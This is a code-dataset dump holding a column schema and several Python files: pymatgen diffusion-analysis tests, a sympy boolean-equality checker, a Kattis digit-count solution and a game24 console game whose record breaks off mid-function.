hexsha
stringlengths
40
40
size
int64
7
1.04M
ext
stringclasses
10 values
lang
stringclasses
1 value
max_stars_repo_path
stringlengths
4
247
max_stars_repo_name
stringlengths
4
125
max_stars_repo_head_hexsha
stringlengths
40
78
max_stars_repo_licenses
sequencelengths
1
10
max_stars_count
int64
1
368k
max_stars_repo_stars_event_min_datetime
stringlengths
24
24
max_stars_repo_stars_event_max_datetime
stringlengths
24
24
max_issues_repo_path
stringlengths
4
247
max_issues_repo_name
stringlengths
4
125
max_issues_repo_head_hexsha
stringlengths
40
78
max_issues_repo_licenses
sequencelengths
1
10
max_issues_count
int64
1
116k
max_issues_repo_issues_event_min_datetime
stringlengths
24
24
max_issues_repo_issues_event_max_datetime
stringlengths
24
24
max_forks_repo_path
stringlengths
4
247
max_forks_repo_name
stringlengths
4
125
max_forks_repo_head_hexsha
stringlengths
40
78
max_forks_repo_licenses
sequencelengths
1
10
max_forks_count
int64
1
105k
max_forks_repo_forks_event_min_datetime
stringlengths
24
24
max_forks_repo_forks_event_max_datetime
stringlengths
24
24
content
stringlengths
1
1.04M
avg_line_length
float64
1.77
618k
max_line_length
int64
1
1.02M
alphanum_fraction
float64
0
1
original_content
stringlengths
7
1.04M
filtered:remove_function_no_docstring
int64
-102
942k
filtered:remove_class_no_docstring
int64
-354
977k
filtered:remove_delete_markers
int64
0
60.1k
6776cf0bd080254a676d541e382d4eb2f31a05f5
7,640
py
Python
pymatgen/analysis/tests/test_diffusion_analyzer.py
rajeshprasanth/pymatgen
eb6cd95230c11ac761a96ebf82b98f71177bb71f
[ "MIT" ]
null
null
null
pymatgen/analysis/tests/test_diffusion_analyzer.py
rajeshprasanth/pymatgen
eb6cd95230c11ac761a96ebf82b98f71177bb71f
[ "MIT" ]
null
null
null
pymatgen/analysis/tests/test_diffusion_analyzer.py
rajeshprasanth/pymatgen
eb6cd95230c11ac761a96ebf82b98f71177bb71f
[ "MIT" ]
1
2018-10-28T01:41:38.000Z
2018-10-28T01:41:38.000Z
# coding: utf-8 # Copyright (c) Pymatgen Development Team. # Distributed under the terms of the MIT License. from __future__ import division, unicode_literals import unittest2 as unittest import os import json import random import numpy as np import csv import scipy.constants as const from pymatgen.analysis.diffusion_analyzer import DiffusionAnalyzer,\ get_conversion_factor, fit_arrhenius from pymatgen.core.structure import Structure from pymatgen.util.testing import PymatgenTest from monty.tempfile import ScratchDir """ TODO: Change the module doc. """ __author__ = "shyuepingong" __version__ = "0.1" __maintainer__ = "Shyue Ping Ong" __email__ = "shyuep@gmail.com" __status__ = "Beta" __date__ = "5/2/13" test_dir = os.path.join(os.path.dirname(__file__), "..", "..", "..", 'test_files') if __name__ == '__main__': unittest.main()
41.978022
85
0.610602
# coding: utf-8 # Copyright (c) Pymatgen Development Team. # Distributed under the terms of the MIT License. from __future__ import division, unicode_literals import unittest2 as unittest import os import json import random import numpy as np import csv import scipy.constants as const from pymatgen.analysis.diffusion_analyzer import DiffusionAnalyzer,\ get_conversion_factor, fit_arrhenius from pymatgen.core.structure import Structure from pymatgen.util.testing import PymatgenTest from monty.tempfile import ScratchDir """ TODO: Change the module doc. """ __author__ = "shyuepingong" __version__ = "0.1" __maintainer__ = "Shyue Ping Ong" __email__ = "shyuep@gmail.com" __status__ = "Beta" __date__ = "5/2/13" test_dir = os.path.join(os.path.dirname(__file__), "..", "..", "..", 'test_files') class FuncTest(unittest.TestCase): def test_get_conversion_factor(self): filepath = os.path.join(test_dir, 'LiFePO4.cif') s = Structure.from_file(filepath) # large tolerance because scipy constants changed between 0.16.1 and 0.17 self.assertAlmostEqual(41370704.343540139, get_conversion_factor(s, "Li", 600), delta=20) def test_fit_arrhenius(self): Ea = 0.5 k = const.k / const.e c = 12 temps = np.array([300, 1000, 500]) diffusivities = c * np.exp(-Ea/(k * temps)) diffusivities *= np.array([1.00601834013, 1.00803236262, 0.98609720824]) r = fit_arrhenius(temps, diffusivities) self.assertAlmostEqual(r[0], Ea) self.assertAlmostEqual(r[1], c) self.assertAlmostEqual(r[2], 0.000895566) # when not enough values for error estimate r2 = fit_arrhenius([1, 2], [10, 10]) self.assertAlmostEqual(r2[0], 0) self.assertAlmostEqual(r2[1], 10) self.assertEqual(r2[2], None) class DiffusionAnalyzerTest(PymatgenTest): def test_init(self): # Diffusion vasprun.xmls are rather large. We are only going to use a # very small preprocessed run for testing. Note that the results are # unreliable for short runs. with open(os.path.join(test_dir, "DiffusionAnalyzer.json")) as f: dd = json.load(f) d = DiffusionAnalyzer.from_dict(dd) # large tolerance because scipy constants changed between 0.16.1 and 0.17 self.assertAlmostEqual(d.conductivity, 74.165372613735684, 4) self.assertAlmostEqual(d.diffusivity, 1.16083658794e-06, 7) self.assertAlmostEqual(d.conductivity_std_dev, 0.0097244677795984488, 7) self.assertAlmostEqual(d.diffusivity_std_dev, 9.1013023085561779e-09, 7) self.assertArrayAlmostEqual( d.conductivity_components, [45.9109703, 26.2856302, 150.5405727], 3) self.assertArrayAlmostEqual( d.diffusivity_components, [7.49601236e-07, 4.90254273e-07, 2.24649255e-06]) self.assertArrayAlmostEqual( d.conductivity_components_std_dev, [0.0063579, 0.0180862, 0.0217917] ) self.assertArrayAlmostEqual( d.diffusivity_components_std_dev, [8.9465670e-09, 2.4931224e-08, 2.2636384e-08] ) self.assertArrayAlmostEqual( d.max_ion_displacements, [1.4620659693989553, 1.2787303484445025, 3.419618540097756, 2.340104469126246, 2.6080973517594233, 1.3928579365672844, 1.3561505956708932, 1.6699242923686253, 1.0352389639563648, 1.1662520093955808, 1.2322019205885841, 0.8094210554832534, 1.9917808504954169, 1.2684148391206396, 2.392633794162402, 2.566313049232671, 1.3175030435622759, 1.4628945430952793, 1.0984921286753002, 1.2864482076554093, 0.655567027815413, 0.5986961164605746, 0.5639091444309045, 0.6166004192954059, 0.5997911580422605, 0.4374606277579815, 1.1865683960470783, 0.9017064371676591, 0.6644840367853767, 1.0346375380664645, 0.6177630142863979, 0.7952002051914302, 0.7342686123054011, 0.7858047956905577, 0.5570732369065661, 1.0942937746885417, 0.6509372395308788, 1.0876687380413455, 0.7058162184725, 0.8298306317598585, 0.7813913747621343, 0.7337655232056153, 0.9057161616236746, 0.5979093093186919, 0.6830333586985015, 0.7926500894084628, 0.6765180009988608, 0.8555866032968998, 0.713087091642237, 0.7621007695790749]) self.assertEqual(d.sq_disp_ions.shape, (50, 206)) self.assertAlmostEqual(d.max_framework_displacement, 1.18656839605) ss = list(d.get_drift_corrected_structures(10, 1000, 20)) self.assertEqual(len(ss), 50) n = random.randint(0, 49) n_orig = n * 20 + 10 self.assertArrayAlmostEqual( ss[n].cart_coords - d.structure.cart_coords + d.drift[:, n_orig, :], d.disp[:, n_orig, :]) d = DiffusionAnalyzer.from_dict(d.as_dict()) self.assertIsInstance(d, DiffusionAnalyzer) #Ensure summary dict is json serializable. json.dumps(d.get_summary_dict(include_msd_t=True)) d = DiffusionAnalyzer(d.structure, d.disp, d.specie, d.temperature, d.time_step, d.step_skip, smoothed="max") self.assertAlmostEqual(d.conductivity, 74.165372613735684, 4) self.assertAlmostEqual(d.diffusivity, 1.14606446822e-06, 7) d = DiffusionAnalyzer(d.structure, d.disp, d.specie, d.temperature, d.time_step, d.step_skip, smoothed=False) self.assertAlmostEqual(d.conductivity, 27.20479170406027, 4) self.assertAlmostEqual(d.diffusivity, 4.25976905436e-07, 7) d = DiffusionAnalyzer(d.structure, d.disp, d.specie, d.temperature, d.time_step, d.step_skip, smoothed="constant", avg_nsteps=100) self.assertAlmostEqual(d.conductivity, 47.404056230438741, 4) self.assertAlmostEqual(d.diffusivity, 7.4226016496716148e-07, 7) # Can't average over 2000 steps because this is a 1000-step run. self.assertRaises(ValueError, DiffusionAnalyzer, d.structure, d.disp, d.specie, d.temperature, d.time_step, d.step_skip, smoothed="constant", avg_nsteps=2000) d = DiffusionAnalyzer.from_structures( list(d.get_drift_corrected_structures()), d.specie, d.temperature, d.time_step, d.step_skip, d.smoothed, avg_nsteps=100) self.assertAlmostEqual(d.conductivity, 47.404056230438741, 4) self.assertAlmostEqual(d.diffusivity, 7.4226016496716148e-07, 7) d.export_msdt("test.csv") with open("test.csv") as f: data = [] for row in csv.reader(f): if row: data.append(row) data.pop(0) data = np.array(data, dtype=np.float64) self.assertArrayAlmostEqual(data[:, 1], d.msd) os.remove("test.csv") if __name__ == '__main__': unittest.main()
6,595
34
127
d94e383e015801e9caaa411360f5d5c3c970581d
9,511
py
Python
checker/logic.py
ucam-cl-dtg/equality_checker
6a31d3dd360f821e36c4742e1d5139d7292f8319
[ "Apache-2.0" ]
7
2020-07-18T08:04:27.000Z
2022-03-07T06:46:17.000Z
checker/logic.py
ucam-cl-dtg/equality_checker
6a31d3dd360f821e36c4742e1d5139d7292f8319
[ "Apache-2.0" ]
1
2022-03-18T17:05:54.000Z
2022-03-18T17:05:54.000Z
checker/logic.py
ucam-cl-dtg/equality_checker
6a31d3dd360f821e36c4742e1d5139d7292f8319
[ "Apache-2.0" ]
1
2020-07-18T08:04:28.000Z
2020-07-18T08:04:28.000Z
import sympy from .utils import known_equal_pair, contains_incorrect_symbols from .utils import EqualityType from .parsing import logic_parser, UnsafeInputException __all__ = ["check"] KNOWN_PAIRS = dict() def parse_expression(expression_str, *, local_dict=None): """Take a string containing a mathematical expression and return a sympy expression. Wrap the parsing class function parse_expr(...) and catch any exceptions that occur. - 'local_dict' can be a dictionary of (name, sympy.Symbol(...)) pairs, where the string 'name' will not be split up and will be turned into the symbol specified. It may be None. """ try: return logic_parser.parse_expr(expression_str, local_dict=local_dict) except logic_parser.ParsingException: print("Incorrectly formatted expression.") print("Fail: '{}'.".format(expression_str)) return None def exact_match(test_expr, target_expr): """Test if the entered expression exactly matches the known expression. This performs as little simplification of the boolean expression as possible, allowing only the commutativity or AND and OR. Returns True if the sympy expressions have the same internal structure, and False if not. - 'test_expr' should be the untrusted sympy expression to check. - 'target_expr' should be the trusted sympy expression to match against. """ print("[EXACT TEST]") if test_expr == target_expr: print("Exact Match (with '==')") return True elif sympy.srepr(test_expr) == sympy.srepr(target_expr): # This is a (perfectly acceptable) hack for ordering the atoms of each # term, but a more explicit method may be preferable in the future. print("Exact Match (with 'srepr')") return True else: return False def symbolic_equality(test_expr, target_expr): """Test if two expressions are symbolically equivalent. Use the sympy 'simplify_logic' function to simplify the two boolean expressions as much as possible. Two equilvalent expressions MUST simplify to the same thing, and then they can be tested for equivalence again. Returns True if sympy can determine that the two expressions are equal, and returns False if they are not equal. - 'test_expr' should be the untrusted sympy expression to check. - 'target_expr' should be the trusted sympy expression to match against. """ print("[SYMBOLIC TEST]") try: simplified_target = sympy.simplify_logic(target_expr) simplified_test = sympy.simplify_logic(test_expr) if simplified_target == simplified_test or sympy.srepr(simplified_target) == sympy.srepr(simplified_test): print("Symbolic match.") print("INFO: Adding known pair ({0}, {1})".format(target_expr, test_expr)) KNOWN_PAIRS[(target_expr, test_expr)] = EqualityType.SYMBOLIC return True else: return False except NotImplementedError as e: print("{0}: {1} - Can't check symbolic equality!".format(type(e).__name__, str(e).capitalize())) return False def expr_equality(test_expr, target_expr): """Given two sympy expressions: test for exact, symbolic and numeric equality. Check two sympy expressions for equality, throwing a TypeError if either of the provided sympy objects is not an expression. - 'test_expr' should be the untrusted sympy expression to check. - 'target_expr' should be the trusted sympy expression to match against. """ equality_type = EqualityType.EXACT equal = exact_match(test_expr, target_expr) if not equal: # Then try checking for symbolic equality: equality_type = EqualityType.SYMBOLIC equal = symbolic_equality(test_expr, target_expr) return equal, equality_type def general_equality(test_expr, target_expr): """Given two general sympy objects: test for exact, symbolic and numeric equality. - 'test_expr' should be the untrusted sympy object to check. - 'target_expr' should be the trusted sympy object to match against. """ equal, equality_type = known_equal_pair(KNOWN_PAIRS, test_expr, target_expr) # If this is a known pair: return immediately: if equal: return equal, equality_type else: print("[[EXPRESSION CHECK]]") return expr_equality(test_expr, target_expr) def check(test_str, target_str, *, symbols=None, check_symbols=True, description=None, _quiet=False): """The main checking function, calls each of the equality checking functions as required. Returns a dict describing the equality; with important keys being 'equal', and 'equality_type'. The key 'error' is added if something went wrong, and this should always be checked for first. - 'test_str' should be the untrusted string for sympy to parse. - 'target_str' should be the trusted string to parse and match against. - 'symbols' should be a string list or comma separated string of symbols not to split during parsing. - 'check_symbols' indicates whether to verfiy the symbols used in each expression are exactly the same or not; setting this to False will allow symbols which cancel out to be included (probably don't want this in questions). - 'description' is an optional description to print before the checker's output to stdout which can be used to improve logging. - '_quiet' is an internal argument used to suppress some output when this function is called from plus_minus_checker(). """ # Suppress this output if necessary: if not _quiet: print("=" * 50) # For logging purposes, if we have a description: print it! if description is not None: print(description) print("=" * 50) print("[LOGIC]") # If nothing to parse, fail. On server, this will be caught in check_endpoint() if (target_str == "") or (test_str == ""): print("ERROR: No input provided!") if not _quiet: print("=" * 50) return dict(error="Empty string as argument.") # Cleanup the strings before anything is done to them: error_is_test = False try: target_str = logic_parser.cleanup_string(target_str, reject_unsafe_input=True) error_is_test = True test_str = logic_parser.cleanup_string(test_str, reject_unsafe_input=True) except UnsafeInputException: print("ERROR: Input contained non-whitelisted characters!") result = dict(error="Bad input provided!") if error_is_test: print("Test string: '{}'".format(test_str)) result["syntax_error"] = str(True).lower() if not _quiet: print("=" * 50) return result print("Target string: '{}'".format(target_str)) print("Test string: '{}'".format(test_str)) print("[[PARSE EXPRESSIONS]]") # Parse the trusted target expression: target_expr = parse_expression(target_str) # Parse the untrusted test expression: test_expr = parse_expression(test_str) result = dict(target=target_str, test=test_str) if target_expr is None: print("ERROR: TRUSTED EXPRESSION CANNOT BE PARSED!") if not _quiet: print("=" * 50) result["error"] = "Parsing TARGET Expression Failed!" result["code"] = 400 # This is fatal! return result if test_expr is None: print("Incorrectly formatted ToCheck expression.") if not _quiet: print("=" * 50) result["error"] = "Parsing Test Expression Failed!" result["syntax_error"] = str(True).lower() return result result["parsed_target"] = str(target_expr) result["parsed_test"] = str(test_expr) # Now check for symbol match and equality: try: print("Parsed Target: {0}\nParsed ToCheck: {1}".format(target_expr, test_expr)) if check_symbols: # Do we have same set of symbols in each? incorrect_symbols = contains_incorrect_symbols(test_expr, target_expr) if incorrect_symbols is not None: print("[[RESULT]]\nEquality: False") if not _quiet: print("=" * 50) result["equal"] = str(False).lower() result["equality_type"] = EqualityType.SYMBOLIC.value result["incorrect_symbols"] = incorrect_symbols return result # Then check for equality proper: equal, equality_type = general_equality(test_expr, target_expr) except (SyntaxError, TypeError, AttributeError) as e: print("Error when comparing expressions: '{}'.".format(e)) if not _quiet: print("=" * 50) result["error"] = "Comparison of expressions failed: '{}'".format(e) return result print("[[RESULT]]") if equal and (equality_type is not EqualityType.EXACT) and ((target_expr, test_expr) not in KNOWN_PAIRS): print("INFO: Adding known pair ({0}, {1})".format(target_expr, test_expr)) KNOWN_PAIRS[(target_expr, test_expr)] = equality_type print("Equality: {}".format(equal)) if not _quiet: print("=" * 50) result["equal"] = str(equal).lower() result["equality_type"] = equality_type.value return result
40.819742
114
0.66134
import sympy from .utils import known_equal_pair, contains_incorrect_symbols from .utils import EqualityType from .parsing import logic_parser, UnsafeInputException __all__ = ["check"] KNOWN_PAIRS = dict() def parse_expression(expression_str, *, local_dict=None): """Take a string containing a mathematical expression and return a sympy expression. Wrap the parsing class function parse_expr(...) and catch any exceptions that occur. - 'local_dict' can be a dictionary of (name, sympy.Symbol(...)) pairs, where the string 'name' will not be split up and will be turned into the symbol specified. It may be None. """ try: return logic_parser.parse_expr(expression_str, local_dict=local_dict) except logic_parser.ParsingException: print("Incorrectly formatted expression.") print("Fail: '{}'.".format(expression_str)) return None def exact_match(test_expr, target_expr): """Test if the entered expression exactly matches the known expression. This performs as little simplification of the boolean expression as possible, allowing only the commutativity or AND and OR. Returns True if the sympy expressions have the same internal structure, and False if not. - 'test_expr' should be the untrusted sympy expression to check. - 'target_expr' should be the trusted sympy expression to match against. """ print("[EXACT TEST]") if test_expr == target_expr: print("Exact Match (with '==')") return True elif sympy.srepr(test_expr) == sympy.srepr(target_expr): # This is a (perfectly acceptable) hack for ordering the atoms of each # term, but a more explicit method may be preferable in the future. print("Exact Match (with 'srepr')") return True else: return False def symbolic_equality(test_expr, target_expr): """Test if two expressions are symbolically equivalent. Use the sympy 'simplify_logic' function to simplify the two boolean expressions as much as possible. Two equilvalent expressions MUST simplify to the same thing, and then they can be tested for equivalence again. Returns True if sympy can determine that the two expressions are equal, and returns False if they are not equal. - 'test_expr' should be the untrusted sympy expression to check. - 'target_expr' should be the trusted sympy expression to match against. """ print("[SYMBOLIC TEST]") try: simplified_target = sympy.simplify_logic(target_expr) simplified_test = sympy.simplify_logic(test_expr) if simplified_target == simplified_test or sympy.srepr(simplified_target) == sympy.srepr(simplified_test): print("Symbolic match.") print("INFO: Adding known pair ({0}, {1})".format(target_expr, test_expr)) KNOWN_PAIRS[(target_expr, test_expr)] = EqualityType.SYMBOLIC return True else: return False except NotImplementedError as e: print("{0}: {1} - Can't check symbolic equality!".format(type(e).__name__, str(e).capitalize())) return False def expr_equality(test_expr, target_expr): """Given two sympy expressions: test for exact, symbolic and numeric equality. Check two sympy expressions for equality, throwing a TypeError if either of the provided sympy objects is not an expression. - 'test_expr' should be the untrusted sympy expression to check. - 'target_expr' should be the trusted sympy expression to match against. """ equality_type = EqualityType.EXACT equal = exact_match(test_expr, target_expr) if not equal: # Then try checking for symbolic equality: equality_type = EqualityType.SYMBOLIC equal = symbolic_equality(test_expr, target_expr) return equal, equality_type def general_equality(test_expr, target_expr): """Given two general sympy objects: test for exact, symbolic and numeric equality. - 'test_expr' should be the untrusted sympy object to check. - 'target_expr' should be the trusted sympy object to match against. """ equal, equality_type = known_equal_pair(KNOWN_PAIRS, test_expr, target_expr) # If this is a known pair: return immediately: if equal: return equal, equality_type else: print("[[EXPRESSION CHECK]]") return expr_equality(test_expr, target_expr) def check(test_str, target_str, *, symbols=None, check_symbols=True, description=None, _quiet=False): """The main checking function, calls each of the equality checking functions as required. Returns a dict describing the equality; with important keys being 'equal', and 'equality_type'. The key 'error' is added if something went wrong, and this should always be checked for first. - 'test_str' should be the untrusted string for sympy to parse. - 'target_str' should be the trusted string to parse and match against. - 'symbols' should be a string list or comma separated string of symbols not to split during parsing. - 'check_symbols' indicates whether to verfiy the symbols used in each expression are exactly the same or not; setting this to False will allow symbols which cancel out to be included (probably don't want this in questions). - 'description' is an optional description to print before the checker's output to stdout which can be used to improve logging. - '_quiet' is an internal argument used to suppress some output when this function is called from plus_minus_checker(). """ # Suppress this output if necessary: if not _quiet: print("=" * 50) # For logging purposes, if we have a description: print it! if description is not None: print(description) print("=" * 50) print("[LOGIC]") # If nothing to parse, fail. On server, this will be caught in check_endpoint() if (target_str == "") or (test_str == ""): print("ERROR: No input provided!") if not _quiet: print("=" * 50) return dict(error="Empty string as argument.") # Cleanup the strings before anything is done to them: error_is_test = False try: target_str = logic_parser.cleanup_string(target_str, reject_unsafe_input=True) error_is_test = True test_str = logic_parser.cleanup_string(test_str, reject_unsafe_input=True) except UnsafeInputException: print("ERROR: Input contained non-whitelisted characters!") result = dict(error="Bad input provided!") if error_is_test: print("Test string: '{}'".format(test_str)) result["syntax_error"] = str(True).lower() if not _quiet: print("=" * 50) return result print("Target string: '{}'".format(target_str)) print("Test string: '{}'".format(test_str)) print("[[PARSE EXPRESSIONS]]") # Parse the trusted target expression: target_expr = parse_expression(target_str) # Parse the untrusted test expression: test_expr = parse_expression(test_str) result = dict(target=target_str, test=test_str) if target_expr is None: print("ERROR: TRUSTED EXPRESSION CANNOT BE PARSED!") if not _quiet: print("=" * 50) result["error"] = "Parsing TARGET Expression Failed!" result["code"] = 400 # This is fatal! return result if test_expr is None: print("Incorrectly formatted ToCheck expression.") if not _quiet: print("=" * 50) result["error"] = "Parsing Test Expression Failed!" result["syntax_error"] = str(True).lower() return result result["parsed_target"] = str(target_expr) result["parsed_test"] = str(test_expr) # Now check for symbol match and equality: try: print("Parsed Target: {0}\nParsed ToCheck: {1}".format(target_expr, test_expr)) if check_symbols: # Do we have same set of symbols in each? incorrect_symbols = contains_incorrect_symbols(test_expr, target_expr) if incorrect_symbols is not None: print("[[RESULT]]\nEquality: False") if not _quiet: print("=" * 50) result["equal"] = str(False).lower() result["equality_type"] = EqualityType.SYMBOLIC.value result["incorrect_symbols"] = incorrect_symbols return result # Then check for equality proper: equal, equality_type = general_equality(test_expr, target_expr) except (SyntaxError, TypeError, AttributeError) as e: print("Error when comparing expressions: '{}'.".format(e)) if not _quiet: print("=" * 50) result["error"] = "Comparison of expressions failed: '{}'".format(e) return result print("[[RESULT]]") if equal and (equality_type is not EqualityType.EXACT) and ((target_expr, test_expr) not in KNOWN_PAIRS): print("INFO: Adding known pair ({0}, {1})".format(target_expr, test_expr)) KNOWN_PAIRS[(target_expr, test_expr)] = equality_type print("Equality: {}".format(equal)) if not _quiet: print("=" * 50) result["equal"] = str(equal).lower() result["equality_type"] = equality_type.value return result
0
0
0
559890790ae2649fffcbdb6731e70ef5186638d7
222
py
Python
Kattis/How Many Digits/howmanydigits.py
DeepSpace2/Comptitive-Programming
13212d9dbc73ab87519b0596fdb0147d40c7eaa8
[ "MIT" ]
1
2021-11-12T16:39:40.000Z
2021-11-12T16:39:40.000Z
Kattis/How Many Digits/howmanydigits.py
DeepSpace2/Comptitive-Programming
13212d9dbc73ab87519b0596fdb0147d40c7eaa8
[ "MIT" ]
null
null
null
Kattis/How Many Digits/howmanydigits.py
DeepSpace2/Comptitive-Programming
13212d9dbc73ab87519b0596fdb0147d40c7eaa8
[ "MIT" ]
3
2021-07-01T11:46:19.000Z
2021-09-12T13:49:04.000Z
from math import e, log10, pi while True: try: n = int(input()) except EOFError: break if n == 0: print(1) else: print(int(n * log10(n / e) + log10(2 * pi * n) / 2) + 1)
20.181818
64
0.463964
from math import e, log10, pi while True: try: n = int(input()) except EOFError: break if n == 0: print(1) else: print(int(n * log10(n / e) + log10(2 * pi * n) / 2) + 1)
0
0
0
72eb43c27020f9c97d40a6a12b90946e9a888bc7
10,665
py
Python
game24/gameconsole.py
Adoyan-Grigor/game24
4619e953ed94248669759850b9efb812ecf54786
[ "Apache-2.0" ]
null
null
null
game24/gameconsole.py
Adoyan-Grigor/game24
4619e953ed94248669759850b9efb812ecf54786
[ "Apache-2.0" ]
null
null
null
game24/gameconsole.py
Adoyan-Grigor/game24
4619e953ed94248669759850b9efb812ecf54786
[ "Apache-2.0" ]
null
null
null
#!/usr/bin/python # -*- coding: utf-8 -*- from __future__ import absolute_import, print_function, division import sys import argparse import readline import random import traceback try: import builtins raw_input = getattr(builtins, 'input') except ImportError: pass from game24 import calc, game MSG_MENU_MAIN = '''1. Play (p) 2. Check answer (c) 3. Quit (q)''' MSG_MENU_PLAY = '''1. Definitely no solutions (n) 2. Give me a hint (h) 3. I gave up, show me the answer (s) 4. Back to the main menu (b) 5. Quit the game (q)''' MSG_MENU_SET_END = '''1. One more set (n) 2. Back to the main menu (b) 3. Quit the game (q)''' MSG_MENU_PLAY_RIGHT = '''1. Try other solutions (t) 2. Next hand (n) 3. Show me the answers (s) 4. Quit the game (q)''' MSG_SELECT = 'Your choice: ' MSG_INVALID_INPUT = 'Invalid input!' MSG_MENU_HAND_END = '''1. One more hand (n) 2. Quit this set, back to the main menu (b) 3. Quit the game (q)''' MSG_SELECT = 'Your choice: ' MSG_INVALID_INPUT = 'Invalid input!' MSG_INVALID_INTEGER = 'Invalid integer: %s' MSG_PLAY_NEW_SET = 'Set %d' MSG_PLAY_NEW_HAND = 'Hand %d: %s' MSG_PLAY_INPUT_EXPR = 'Input your solution or one of the above choices: ' MSG_PLAY_RIGHT = 'Good Job!' MSG_PLAY_FIND_BUG = '''Great Job! You not only solved the problem, but also found a bug! Please report to me with the cards and your solution if you don't mind.''' MSG_PLAY_WRONG = "Sorry! It's not correct!" MSG_PLAY_NO_ANSWER = 'Seems no solutions' MSG_PLAY_NO_CARDS = 'Set end, your result' MSG_INPUT_NUMBERS = 'Please input %d integers: ' INPUT_EOF = '\x00' if __name__ == '__main__': main()
30.913043
83
0.509048
#!/usr/bin/python # -*- coding: utf-8 -*- from __future__ import absolute_import, print_function, division import sys import argparse import readline import random import traceback try: import builtins raw_input = getattr(builtins, 'input') except ImportError: pass from game24 import calc, game MSG_MENU_MAIN = '''1. Play (p) 2. Check answer (c) 3. Quit (q)''' MSG_MENU_PLAY = '''1. Definitely no solutions (n) 2. Give me a hint (h) 3. I gave up, show me the answer (s) 4. Back to the main menu (b) 5. Quit the game (q)''' MSG_MENU_SET_END = '''1. One more set (n) 2. Back to the main menu (b) 3. Quit the game (q)''' MSG_MENU_PLAY_RIGHT = '''1. Try other solutions (t) 2. Next hand (n) 3. Show me the answers (s) 4. Quit the game (q)''' MSG_SELECT = 'Your choice: ' MSG_INVALID_INPUT = 'Invalid input!' MSG_MENU_HAND_END = '''1. One more hand (n) 2. Quit this set, back to the main menu (b) 3. Quit the game (q)''' MSG_SELECT = 'Your choice: ' MSG_INVALID_INPUT = 'Invalid input!' MSG_INVALID_INTEGER = 'Invalid integer: %s' MSG_PLAY_NEW_SET = 'Set %d' MSG_PLAY_NEW_HAND = 'Hand %d: %s' MSG_PLAY_INPUT_EXPR = 'Input your solution or one of the above choices: ' MSG_PLAY_RIGHT = 'Good Job!' MSG_PLAY_FIND_BUG = '''Great Job! You not only solved the problem, but also found a bug! Please report to me with the cards and your solution if you don't mind.''' MSG_PLAY_WRONG = "Sorry! It's not correct!" MSG_PLAY_NO_ANSWER = 'Seems no solutions' MSG_PLAY_NO_CARDS = 'Set end, your result' MSG_INPUT_NUMBERS = 'Please input %d integers: ' INPUT_EOF = '\x00' class GameConsole(game.Game): def __init__(self, target=24, count=4, face2ten=False, showcard=False): super(GameConsole, self).__init__(target, count, face2ten) self.showcard = showcard @staticmethod def raw_input_ex(prompt='', default=''): '''enhance raw_input to support default input and also flat EOF''' try: readline.set_startup_hook(lambda: readline.insert_text(default)) try: return input(prompt) finally: readline.set_startup_hook() except EOFError: return INPUT_EOF @staticmethod def print_title(title, dechar='', delen=50): print(dechar * delen) print(title) print(dechar * delen) @staticmethod def ui_menu(menu, choices, eof=True): '''show a menu, and return the selection''' GameConsole.print_title(menu, dechar='-') while True: r = GameConsole.raw_input_ex(MSG_SELECT).strip() if r == '' or (r in choices and len(r) > 1): print(MSG_INVALID_INPUT) continue elif r in choices or (eof and r == INPUT_EOF): print() return r print(MSG_INVALID_INPUT) def ui_check_answer(self): '''show answers for user provided integers''' while True: r = self.raw_input_ex(MSG_INPUT_NUMBERS % self.count).strip() try: integers = [int(s) for s in r.strip().split()] except ValueError: print(MSG_INVALID_INPUT) continue if len(integers) != self.count: print(MSG_INVALID_INPUT) continue break answers = calc.solve(integers, self.target) if answers: s = '\n'.join([str(expr) for expr in answers]) else: s = MSG_PLAY_NO_ANSWER self.print_title(s) def main(self): '''the main entry of the game console''' choices = '1p2c3q' while True: r = self.ui_menu(MSG_MENU_MAIN, choices) if r in '1p': self.play() elif r in '2c': self.ui_check_answer() elif r in ('3q' + INPUT_EOF): return def print_result(self): solved = 0 failed = 0 hinted = 0 for hand in self.hands: if hand.result == game.HAND_RESULT_SOLVED: solved += 1 elif hand.result == game.HAND_RESULT_HINTED: hinted += 1 elif hand.result == game.HAND_RESULT_FAILED: failed += 1 print() print('Total %d hands solved' % solved) print('Total %d hands solved with hint' % hinted) print('Total %d hands failed to solve' % failed) print() def ui_menu_and_expr(self, menu, choices, eof=True): hand_ints = self.hands[-1].integers self.print_title(menu, dechar='-') while True: r = self.raw_input_ex(MSG_PLAY_INPUT_EXPR).strip() if r == '' or (r in choices and len(r) > 1): print(MSG_INVALID_INPUT) continue elif r in choices or (eof and r == INPUT_EOF): print() return r try: expr = calc.parse(r) except ValueError as e: print(str(e)) continue integers = expr.get_integers() for i in integers: if i not in hand_ints: print(MSG_INVALID_INTEGER % i) break else: return expr def play(self): while True: if not self.hands: self.print_title(MSG_PLAY_NEW_SET % self.seti, dechar='*') hand = self.new_hand() if not hand: # no enough cards for a new hand self.print_title(MSG_PLAY_NO_CARDS, dechar='*') self.print_result() choices = '1n2b3q' r = self.ui_menu(MSG_MENU_SET_END, choices) if r in '1n': # renew the set self.reset() continue elif r in ('2b' + INPUT_EOF): # back to the main menu return elif r in '3q': sys.exit(0) print() if self.showcard: sc = hand.str_cards() else: sc = ' '.join([str(i) for i in hand.integers]) self.print_title(MSG_PLAY_NEW_HAND % (len(self.hands), sc), dechar='+') print() while True: choices = '1n2h3s4b5q' r = self.ui_menu_and_expr(MSG_MENU_PLAY, choices) if isinstance(r, calc.Expr): expr = r check_r = str(r) if expr.value == self.target: hand.solved() if not self.calculating_the_number_of_numbers(check_r, sc): print(MSG_INVALID_INPUT) continue s = MSG_PLAY_RIGHT self.print_title(s) choices = '1t2n3s4q' r = self.ui_menu(MSG_MENU_PLAY_RIGHT, choices, eof=False) if r in '1t': continue elif r in '2n': break elif r in '3s': self.print_title(hand.str_answer()) elif r in '4q': sys.exit(0) else: self.print_title(MSG_PLAY_WRONG) continue elif r in '1n': # no answer if hand.answers: self.print_title(MSG_PLAY_WRONG) continue else: hand.solved() self.print_title(MSG_PLAY_RIGHT) elif r in '2h': # show a hint if hand.answers: hand.hinted() self.print_title(hand.str_hint()) continue else: self.print_title(MSG_PLAY_NO_ANSWER) elif r in '3s': # show the answer if hand.answers: s = hand.str_answer() else: s = MSG_PLAY_NO_ANSWER self.print_title(s) elif r in ('4b' + INPUT_EOF): # back to the main menu return elif r in '5q': sys.exit(0) # this hand is end break def calculating_the_number_of_numbers(self, r, sc): """calculates how many numbers are in the user input""" numb = '' check_list = [] choices = '1234567890' r = r.split() sc = sc.split() for i in r: if i in '+-*×/÷': 